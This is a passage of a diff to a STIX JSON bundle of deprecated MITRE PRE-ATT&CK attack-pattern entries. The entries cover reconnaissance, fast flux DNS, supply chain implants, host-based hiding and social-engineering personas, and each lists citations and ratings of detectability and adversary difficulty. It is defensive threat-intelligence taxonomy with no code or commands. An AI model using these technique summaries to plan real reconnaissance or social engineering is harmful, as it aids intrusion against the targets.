This can be accomplished in several ways including use of a compromised web site to collect details on visiting computers. (Citation: UnseenWorldOfCookies) (Citation: Panopticlick)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1262", + "external_id": "T1262" + }, + { + "source_name": "UnseenWorldOfCookies", + "description": "Joanna Geary, Chris Cross. (2012, April 13). Tracking the trackers: help us reveal the unseen world of cookies. Retrieved March 5, 2017." + }, + { + "source_name": "Panopticlick", + "description": "Electronic Frontier Foundation. (n.d.). Panopticlick: Is your browser safe against tracking?. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Typical information collected as part of accessing web sites (e.g., operating system, browser version, basic configurations).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Basic web scripting capability to collect information of interest on users of interest. 
Requires a compromised web site and the users of interest to navigate there.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1039", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ef6197fd-a58a-4006-bfd6-1d7765d8409d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Enumerate externally facing software applications technologies, languages, and dependencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1261).\n\nSoftware applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1261", + "external_id": "T1261" + }, + { + "source_name": "CommonApplicationAttacks", + "description": "Paul Ionescu. (2015, April 8). The 10 Most Common Application Attacks in Action. Retrieved March 5, 2017." + }, + { + "source_name": "WebApplicationSecurity", + "description": "Gregory Leonard. (2016, February). Getting Started with Web Application Security. Retrieved March 5, 2017." + }, + { + "source_name": "SANSTop25", + "description": "SANS Institute. (2011, June 27). CWE/SANS TOP 25 Most Dangerous Software Errors. Retrieved March 5, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Impossible to differentiate between an adversary and a normal user when accessing a site to determine the languages/technologies used. If active scanning tools are employed, then the defender has the ability to detect. However, this is typically not acted upon due to the large volume of this type of traffic and it will likely not prompt the defender to take any actionable defense. Defender review of access logs may provide some insight based on trends or patterns.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Basic interaction with the site provides insight into the programming languages/technologies used for a given web site. Additionally many of the active scanning tools will also provide some insight into this information.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1038", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--8a64f743-acaa-49d5-9d3d-ae5616a3876f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit public-facing application", + "description": "**This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).**\n\nThe use of software, data, or commands to take advantage of a weakness in a computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. 
(Citation: GoogleCrawlerSQLInj)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1377", + "url": "https://attack.mitre.org/techniques/T1377" + }, + { + "description": "PETER BRIGHT. (2013, November 6). Google crawler tricked into performing SQL injection attacks using decade-old technique. Retrieved March 9, 2017.", + "source_name": "GoogleCrawlerSQLInj" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:20:54.394Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1154", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Launching a SQL injection attack is not overly complex and a commonly used technique. This technique, however, requires finding a vulnerable application.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "If the application and network are designed well, the defender should be able to utilize logging and application logic to catch and deflect SQL injection attacks.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--248cbfdd-fec4-451b-b2a9-e46d4b268e30", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Fast Flux DNS", + "description": "**This technique has been deprecated. Please use [Fast Flux DNS](https://attack.mitre.org/techniques/T1568/001).**\n\nA technique in which a fully qualified domain name has multiple IP addresses assigned to it which are swapped with extreme frequency, using a combination of round robin IP address and short Time-To-Live (TTL) for a DNS resource record. 
(Citation: HoneynetFastFlux) (Citation: MisnomerFastFlux) (Citation: MehtaFastFluxPt1) (Citation: MehtaFastFluxPt2)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1325", + "url": "https://attack.mitre.org/techniques/T1325" + }, + { + "description": "Jamie Riden. (2008, August 16). HOW FAST-FLUX SERVICE NETWORKS WORK. Retrieved March 6, 2017.", + "source_name": "HoneynetFastFlux" + }, + { + "description": "Misnomer. (2012, May 4). RESEARCH TO DETECTION \u2013 IDENTIFY FAST FLUX IN YOUR ENVIRONMENT. Retrieved March 6, 2017.", + "source_name": "MisnomerFastFlux" + }, + { + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref", + "description": "Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.", + "source_name": "MehtaFastFluxPt1" + }, + { + "source_name": "MehtaFastFluxPt2", + "description": "Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.", + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-03-30T14:06:03.611Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true, + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1102", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Fast flux is generally simple for an adversary to set up and offers several advantages. 
Such advantages include limited audit trails for defenders to find, ease of operation for an adversary to maintain, and support for main nodes.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as IPS, domain registrars, and service providers are likely in the best position for detection.", + "x_mitre_detectable_by_common_defenses": "Partial" + }, + { + "id": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Friend/Follow/Connect to targets of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1344).\n\nOnce a persona has been developed an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1344", + "external_id": "T1344" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). 
\u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1121", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "The nature of social media is such that the adversary naturally connects to a target of interest without suspicion, given the purpose of the platform is to promote connections between individuals. Performing activities like typical users, but with specific intent in mind.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless there is some threat intelligence reporting, these users are hard to differentiate.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Friend/Follow/Connect to targets of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1364).\n\nA form of social engineering designed build trust and to lay the foundation for future interactions or attacks. 
(Citation: BlackHatRobinSage)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1364", + "external_id": "T1364" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1141", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Connecting with \"friends\" is a fundamental requirement for social media - without it, social media is worthless. An adversary can easily create a profile and request targets to validate the requests.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Users have the ability to detect and report non-authenticated individuals requesting to follow, friend or connect to a target. However the rigidity in validating the users is not typically followed by standard users.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e754fa49-2db1-416b-92db-7f886decd099", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Generate analyst intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1234).\n\nAnalysts may receive Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from leadership or key decision makers and generate intelligence requirements to articulate intricacies of information required on a topic or question. (Citation: Herring1999)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1234", + "external_id": "T1234" + }, + { + "source_name": "Herring1999", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1011", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--388f3a5c-2cdd-466c-9159-b507fa429fcd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Hardware or software supply chain implant", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1365).\n\nDuring production and distribution, the placement of software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1365", + "external_id": "T1365" + }, + { + "source_name": "McDRecall", + "description": "Tash Shifrin. (2006, October 16). Malware forces McDonald\u2019s recall of giveaway MP3s. Retrieved March 9, 2017." + }, + { + "source_name": "SeagateMaxtor", + "description": "Brandon Hill. (2007, November 14). Seagate Serves External HDDs with a Side of Virus. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The number of elements and components in a supply chain of HW or SW is vast and detecting an implant is complex for SW, but more complex for HW.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Access to the supply chain by an adversary can be a challenging endeavor, depending on what element is attempting to be subverted.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1142", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--6f088e84-37b2-44de-8df3-393908f2d77b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Host-based hiding techniques", + "description": "This object is deprecated as its content 
has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1314).\n\nHost based hiding techniques are designed to allow an adversary to remain undetected on a machine upon which they have taken action. They may do this through the use of static linking of binaries, polymorphic code, exploiting weakness in file formats, parsers, or self-deleting code. (Citation: VirutAP)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1314", + "external_id": "T1314" + }, + { + "source_name": "VirutAP", + "description": "Microsoft Malware Protection Center. (2008, July 30). Virus: Win32/Virut.AP. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Techniques are difficult to detect and might occur in uncommon use-cases (e.g., patching, anti-malware, anti-exploitation software).", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Some of the host-based hiding techniques require advanced knowledge combined with an understanding and awareness of the target's environment (e.g., exploiting weaknesses in file formats, parsers and detection capabilities).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1091", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--fb39384c-00e4-414a-88af-e80c4904e0b8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
"name": "Human performs requested action of physical nature", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nThrough social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1385", + "url": "https://attack.mitre.org/techniques/T1385" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + }, + { + "description": "Taylor Armerding. (2012, October 25). Line blurs between insider, outsider attacks. 
Retrieved March 9, 2017.", + "source_name": "CSOInsideOutside" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-10-14T01:53:28.015Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1162", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Ill-informed users insert devices into their network that they randomly find, despite training educating them why this is not a wise idea.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Non-hypersensing environments do not typically collect this level of detailed information.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--0fad2267-9f46-4ebb-91b5-d543243732cb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify analyst level gaps", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1233).\n\nAnalysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1233", + "external_id": "T1233" + }, + { + "source_name": "BrighthubGapAnalysis", + "description": "Ronda Bowen. (2014, March 26). Performing a Gap Analysis: Where Do You Begin?. Retrieved March 14, 2017." 
+ }, + { + "source_name": "ICD115", + "description": "Office of the Director of National Intelligence. (2012, December 21). ICD 115: Intelligence Community Capability Requirements Process. Retrieved March 2, 2017." + }, + { + "source_name": "JP2-01", + "description": "Joint Chiefs of Staff. (2012, January 05). Joint and National Intelligence Support to Military Operations. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1010", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--1f82ef59-b7da-4cd3-a41c-2e80f80f084f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify business processes/tempo", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1280).\n\nUnderstanding an organizations business processes and tempo may allow an adversary to more effectively craft social engineering attempts or to better hide technical actions, such as those that generate network traffic. 
(Citation: Scasny2015) (Citation: Infosec-osint)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1280", + "external_id": "T1280" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + }, + { + "source_name": "Infosec-osint", + "description": "InfoSec Institute. (2013, September 11). OSINT (Open-Source Intelligence). Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Current or previous employees may divulge information on the Internet. If insiders are used, the defender may have policies or tools in place to detect loss of this data or knowledge.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "In some cases, this requires some insider knowledge or specialized access to learn when critical operations occur in a corporation. For publicly traded US corporations, there is a lot of open source information about their financial reporting obligations (per SEC). Companies announce their annual shareholder meeting and their quarter phone calls with investors. 
Information such as this can help the adversary to glean certain aspects of the business processes and/or rhythm.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1057", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify business relationships", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1272).\n\nBusiness relationship information includes the associates of a target and may be discovered via social media sites such as [LinkedIn](https://www.linkedin.com) or public press releases announcing new partnerships between organizations or people (such as key hire announcements in industry articles). This information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: RSA-APTRecon) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1272", + "external_id": "T1272" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). 
Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender. Much of this information is widely known and difficult to obscure.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Made easier by today's current social media.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1049", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--73e7d7d5-1782-4cd0-a4d7-00c7ec051c2a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify business relationships", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1283).\n\nBusiness relationship information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: 11StepsAttackers)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1283", + "external_id": "T1283" + }, + { + "source_name": "11StepsAttackers", + "description": "Thor Olavsrud. (2014, September 2). 11 Steps Attackers Took to Crack Target. 
Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Exception to the rule is if the adversary tips off the target that others have been asking about the relationship with them.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Requires an intensive process. In some industries, business relationships may be public in order to generate business, but this is not the case for all industries and all relationships.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1060", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d778cb83-2292-4995-b006-d38f52bc1e64", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify gap areas", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1225).\n\nLeadership identifies gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: ODNIIntegration) (Citation: ICD115)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1225", + "external_id": "T1225" + }, + { + "source_name": "ODNIIntegration", + "description": "Office of the Director of National Intelligence. (n.d.). Intelligence Integration - Who Are We. 
Retrieved March 2, 2017." + }, + { + "source_name": "ICD115", + "description": "Office of the Director of National Intelligence. (2012, December 21). ICD 115: Intelligence Community Capability Requirements Process. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1002", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--89a79d91-53e0-4ef5-ba28-558cb8b01f76", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify groups/roles", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1270).\n\nPersonnel internally to a company may belong to a group or maintain a role with electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is a system administrator. 
